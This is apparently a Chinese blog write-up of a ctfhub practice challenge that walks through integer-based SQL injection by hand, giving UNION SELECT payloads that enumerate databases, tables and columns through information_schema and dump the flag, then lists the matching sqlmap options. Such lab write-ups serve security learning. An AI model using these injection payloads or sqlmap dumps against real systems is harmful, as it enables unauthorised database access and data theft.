2025.1.15——六、SQL结构【❤sqlmap❤】

题目来源:ctfhub技能树

目录

一、打开靶机,整理已知信息

二、手工注入解题

[step 1:查看注入类型](#step 1:查看注入类型)

[step 2:order by语句判断字段数](#step 2:order by语句判断字段数)

[step 3:爆数据库名](#step 3:爆数据库名)

[step 4:爆表名](#step 4:爆表名)

[step 5:爆列名](#step 5:爆列名)

[step 6:爆具体数据](#step 6:爆具体数据)

三、sqlmap解题------四步走

[step 1:--current-db](#step 1:--current-db)

[step 2:-D 数据库名 --tables](#step 2:-D 数据库名 --tables)

[​step 3:-D 数据库名 -T 表名 --columns](#step 3:-D 数据库名 -T 表名 --columns)

[step 4:-D 数据库名 -T 表名 -C 列名 --dump](#step 4:-D 数据库名 -T 表名 -C 列名 --dump)


一、打开靶机,整理已知信息

查看页面信息,提示"MySQL结构",所以为sql注入,两种思路:①手工注入;②sqlmap

二、手工注入解题

step 1:查看注入类型

键入:1

键入:1'键入:1''

键入:1 and 1=2 #

键入:1 and 1=1 #

由回显可得本题为整数型注入

step 2:order by语句判断字段数

键入:1 order by 2 #(根据经验,陌生题可使用二分法)

step 3:爆数据库名

sql 复制代码
1 and 1=2 union select database(),database() #

step 4:爆表名

sql 复制代码
1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' #

出现了奇怪的东西,继续看

step 5:爆列名

sql 复制代码
1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='lcwaabhcjo' #

东西应该就在这里

step 6:爆具体数据

sql 复制代码
1 and 1=2 union select 1,zrlcbgazoj from sqli.lcwaabhcjo #

得到flag

三、sqlmap解题------四步走

step 1:--current-db

step 2:-D 数据库名 --tables

step 3:-D 数据库名 -T 表名 --columns

step 4:-D 数据库名 -T 表名 -C 列名 --dump

得到flag。【sqlmap------YYDS】

相关推荐
Channing Lewis24 分钟前
sql server如何创建表导入excel的数据
数据库·oracle·excel
秃头摸鱼侠24 分钟前
MySQL安装与配置
数据库·mysql·adb
IT科技那点事儿26 分钟前
引领AI安全新时代 Accelerate 2025北亚巡展·北京站成功举办
人工智能·安全
UGOTNOSHOT29 分钟前
每日八股文6.3
数据库·sql
竹言笙熙1 小时前
Polarctf2025夏季赛 web java ez_check
java·学习·web安全
行云流水行云流水1 小时前
数据库、数据仓库、数据中台、数据湖相关概念
数据库·数据仓库
John Song1 小时前
Redis 集群批量删除key报错 CROSSSLOT Keys in request don‘t hash to the same slot
数据库·redis·哈希算法
过河不拆乔1 小时前
AWS 公开数据集下载与操作说明
学习·云计算·aws
小狗爱吃黄桃罐头1 小时前
正点原子[第三期]Arm(iMX6U)Linux移植学习笔记-12.1 Linux内核启动流程简介
linux·arm开发·学习
IvanCodes1 小时前
七、Sqoop Job:简化与自动化数据迁移任务及免密执行
大数据·数据库·hadoop·sqoop